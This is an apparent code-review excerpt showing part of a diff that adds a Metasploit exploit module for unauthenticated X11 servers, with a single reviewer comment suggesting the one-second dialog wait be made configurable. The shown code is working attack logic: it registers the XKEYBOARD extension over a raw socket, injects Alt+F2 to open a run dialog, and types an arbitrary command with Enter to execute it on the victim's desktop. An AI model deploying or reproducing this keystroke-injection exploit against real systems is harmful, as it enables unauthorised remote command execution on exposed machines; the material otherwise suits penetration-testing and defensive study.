modules/exploits/unix/x11/x11_keyboard_exec.rb

```diff
@@ -0,0 +1,252 @@
+    end
+
+  end
+
+  def release_key( key )
+    req = "\x8e\x02\x09\x00"
+    req << "\x03"
+    req << key
+    req << "\x00" # Release key
+    req << "\x00" * 4
+    req << "\x00\x08\x01\x00"
+    req << "\x00" * 8
+    req << "\x00\x00\x00\x02"
+    req << "\x00" * 4
+    req << "\x00\x07\x00\x07"
+    req << "\x00\x2b\x00\x01"
+    req << "\x00"
+
+    sock.put(req)
+
+    res = sock.recv(1024)
+    # Response should give 1 on first byte (Success)
+    unless res and res[0] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error releasing key: #{key}")
+    end
+
+  end
+
+  def type_command( command )
+    # Specify the special keys which need to have shift pressed first to type
+    specialkeys = '<>{}|"&()'.chars.to_a
+    values = command.chars.to_a
+    values.each do |value|
+      key = KB_KEYS[value]
+      # Special keys need a shift pressed to be typed
+      if Regexp.union(specialkeys) =~ value
+        press_key(KB_KEYS["lshift"]) # [lshift]
+        press_key(key)
+        release_key(KB_KEYS["lshift"])
+        release_key(key)
+      # Uppercase characters need to be converted to lowercase and be typed in combination with the shift key to generate uppercase
+      elsif value =~ /[A-Z]/
+        press_key(KB_KEYS["lshift"]) # [lshift]
+        press_key(KB_KEYS[value.downcase])
+        release_key(KB_KEYS["lshift"])
+        release_key(KB_KEYS[value.downcase])
+      # All normal keys which are not special keys or uppercase characters
+      else
+        press_key(key)
+        release_key(key)
+      end
+    end
+    # Send an enter
+    press_key( "\x24" ) # [enter]
+    release_key( "\x24" ) # [enter]
+  end
+
+
+  def exploit
+
+    begin
+      connect
+
+      print_status("#{rhost}:#{rport} - Register keyboard")
+      req = "\x6c" # Byte order (Little-Endian)
+      req << "\x00" # Unused
+      req << "\x0b\x00" # Protocol major version: 11
+      req << "\x00\x00" # Protocol minor version: 0
+      req << "\x00\x00" # Authorization protocol name length: 0
+      req << "\x00\x00" # Authorization protocol data length: 0
+      req << "\x00\x00" # Unused
+      # Keyboard registration
+      req << "\x62\x00\x05\x00\x09\x00\x60\x03"
+      req << "XKEYBOARD"
+      req << "\x00"
+      req << "\x00\x00"
+      sock.put(req)
+
+      # Retrieve the whole X11 details response
+      res = sock.recv(4096)
+
+      # Response should give 0x01 in first byte (Success)
+      unless res and res[0] == "\x01"
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Registering keyboard failed")
+      end
+
+      # Press ALT+F2 to start up "Run application"
+      print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
+      press_key(KB_KEYS["alt"])
+      press_key(KB_KEYS["f2"])
+      release_key(KB_KEYS["alt"])
+      release_key(KB_KEYS["f2"])
+
+      # Wait a second to open the dialog
+      select(nil, nil, nil, 1)
```

Comment:
One second may be too slow for a host where the X services have been moved to (slow) swap. Making this configurable would be helpful.